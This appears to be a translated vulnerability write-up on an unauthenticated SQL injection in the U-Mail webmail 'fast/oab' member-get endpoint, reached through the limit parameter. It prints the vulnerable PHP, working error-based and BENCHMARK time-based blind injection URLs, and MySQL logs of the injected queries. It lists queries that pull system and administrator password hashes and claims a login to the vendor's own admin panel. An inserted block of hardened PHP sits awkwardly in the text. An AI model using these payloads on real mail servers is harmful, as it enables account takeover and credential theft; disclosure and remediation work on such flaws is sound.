Last time I only searched the client directory; today I happened to search the fast directory and found another one. Note: every function under the client directory requires login to execute, while some of the functions under the fast directory can be executed without login, though they cannot read mail and so on. The vulnerability has the same root cause as the previous one, but it is in a different file; here the access control is lax and any user can reach it, so SQL injection is possible without logging in. SLEEP cannot be used in LIMIT, so BENCHMARK is used for the delay. Vulnerable file: /fast/oab/module/operates.php, code:
    if ( ACTION == "member-get" ) {
        $dept_id = gss( $_GET['dept_id'] );
        $keyword = gss( $_GET['keyword'] );
        $page = $_GET['page'] ? gss( $_GET['page'] ) : 1;
        // limit
        $limit = $_GET['limit'] ? gss( $_GET['limit'] ) : 25; // user-controlled variable
        $orderby = gss( $_GET['orderby'] );
        $is_reverse = gss( $_GET['is_reverse'] );
        $data_cache = $Department->getDepartmentByDomainID( $domain_id, "dept_id,name,parent_id,`order`", 0 );
        $department_list = create_array( $data_cache, "dept_id", "name" );
        $where = "";
        if ( $dept_id && $dept_id != "-1" ) {
            $Tree = $Department->getTreeObject( );
            $Tree->set_data_cache( $data_cache );
            $Tree->sort_data( -1, 1 );
            $dept_ids = $Tree->get_child_id( $dept_id );
            $user_ids = $Department->getMailboxIDByDepartmentID( $dept_ids, 0 );
            $where = "t1.UserID IN (".$user_ids.")";
        }
        if ( $keyword ) {
            if ( $where ) {
                $where .= " AND ";
            }
            if ( strpos( $keyword, "@" ) ) {
                $key_tmp = explode( "@", $keyword );
                $keyword = $key_tmp[0];
            }
            $where .= "(t1.FullName LIKE \"%".$keyword."%\" OR t1.Mailbox LIKE \"%".$keyword."%\")";
        }
        switch ( $orderby ) {
            case "fullname" : $orderby = "t1.FullName"; break;
            case "mailbox" : $orderby = "t1.Mailbox"; break;
            case "sex" : $orderby = "t2.sex"; break;
            case "birthday" : $orderby = "t2.birthday"; break;
            case "mobile" : $orderby = "t2.mobil"; break;
            case "tel" : $orderby = "t2.teleextension"; break;
            case "position" : $orderby = "t2.headship"; break;
            case "group_num" : $orderby = "t2.o_group"; break;
            case "email" : $orderby = "t1.Mailbox"; break;
            default : $orderby = ""; // the decompiled listing dropped the default label
        }
        $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, $page, $limit, $orderby, $is_reverse, 0 ); // passed into the function
$limit is controllable, which produces the injection. Exploitation process: first POST data to the URL (note: this interface is not really an arbitrary login; after it runs, only the few existing functions can be executed, so if one of those functions has an SQL flaw, a corresponding unauthenticated SQL injection results; for example, if it were possible to update the security question, that would yield a flaw allowing any user's password to be obtained; but the accessible functions are limited and cannot read user mail and so on).
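As an added example (not U-Mail's own code), the same member-get parameter handling written so that limit, page and orderby cannot reach the query text unvalidated; the point is that gss() escapes quotes, which does nothing for LIMIT and ORDER BY since they take no quotes. It assumes an open `$mysqli` connection and an integer `$domain_id`.

```php
<?php
// Added example, not U-Mail's own code: hardened member-get parameter handling.
// Quote escaping does not protect LIMIT/ORDER BY, so page/limit are validated
// as bounded integers, orderby goes through an allow-list, and every user value
// is bound in a prepared statement. Assumed: $mysqli is an open mysqli handle.

// Allow-list for orderby, the mapping the vulnerable switch intends; anything
// else falls back to the default sort instead of reaching the SQL text.
const ORDERBY_MAP = [
    'fullname' => 't1.FullName', 'mailbox' => 't1.Mailbox', 'email' => 't1.Mailbox',
    'sex' => 't2.sex', 'birthday' => 't2.birthday', 'mobile' => 't2.mobil',
    'tel' => 't2.teleextension', 'position' => 't2.headship', 'group_num' => 't2.o_group',
];

// Validate an integer parameter within a range. A value such as
// "1,1 PROCEDURE analyse(...)" fails validation and becomes the default.
function safe_int($value, int $default, int $min, int $max): int
{
    $v = filter_var($value, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? $default : $v;
}

function get_members(mysqli $mysqli, int $domain_id, array $get): array
{
    $page    = safe_int($get['page']  ?? null, 1, 1, 100000);
    $limit   = safe_int($get['limit'] ?? null, 25, 1, 500);
    $orderby = ORDERBY_MAP[(string)($get['orderby'] ?? '')] ?? 't1.OrderNo';
    $dir     = empty($get['is_reverse']) ? 'DESC' : 'ASC';
    $offset  = ($page - 1) * $limit;

    // Only allow-listed identifiers are interpolated; user values are bound.
    $sql = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* "
         . "FROM userlist AS t1 JOIN mailuserinfo AS t2 ON t1.UserID=t2.UserID "
         . "WHERE t1.DomainID=? AND t1.UserID>2 AND t2.is_hidden=0 ";
    $params = [$domain_id];
    $types  = 'i';
    if (($keyword = (string)($get['keyword'] ?? '')) !== '') {
        $keyword = explode('@', $keyword, 2)[0];           // keep the local part only
        $sql    .= "AND (t1.FullName LIKE ? OR t1.Mailbox LIKE ?) ";
        $like    = '%' . addcslashes($keyword, '%_\\') . '%'; // neutralise LIKE wildcards
        array_push($params, $like, $like);
        $types  .= 'ss';
    }
    $sql .= "ORDER BY $orderby $dir LIMIT ?, ?";
    array_push($params, $offset, $limit);                   // bound as integers
    $types .= 'ii';

    $stmt = $mysqli->prepare($sql);
    $stmt->bind_param($types, ...$params);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}
```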
After obtaining the authentication, execute the following:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1+PROCEDURE+analyse(extractvalue(rand(),concat(0x3a,version())),1)
The result is as follows:
The SQL statement executed is:
150128 21:44:43  3142 Connect   umail@localhost on
                 3142 Query     SET NAMES 'UTF8'
                 3142 Init DB   umail
                 3142 Query     SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
                 3142 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                 3142 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1)
                 3142 Quit
Because errors are not echoed back, we use blind injection; the payload is:
http://mail.fuck.com/webmail/fast/oab/index.php?module=operate&action=member-get&limit=1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)
Its SQL is:
150128 21:47:16  3144 Connect   umail@localhost on
                 3144 Query     SET NAMES 'UTF8'
                 3144 Init DB   umail
                 3144 Query     SELECT dept_id,name,parent_id,`order` FROM oab_department WHERE domain_id='1' ORDER BY `order`,`dept_id`
                 3144 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
                 3144 Query     SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 ORDER BY t1.OrderNo DESC,t1.Mailbox ASC LIMIT 1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,(if(ascii(substr((select password from userlist where userid=2),1,1))=97, BENCHMARK(50000000,SHA1(1)),1)))),1)
Injection succeeded. A script can therefore be used to run through different user accounts and passwords. For the administrator accounts:
    system user:        #select+password+from+userlist+where+userid=2
    administrator user: #select+password+from+web_usr+where+usr_code=1
    admin user:         #select+password+from+web_usr+where+usr_code=2
For ordinary users, just iterate over userid to get the username and password. Attached is the blind-injection script (only half written, no binary search and so on; it will do). Local test:
And a screenshot of logging in to the admin panel on the official site: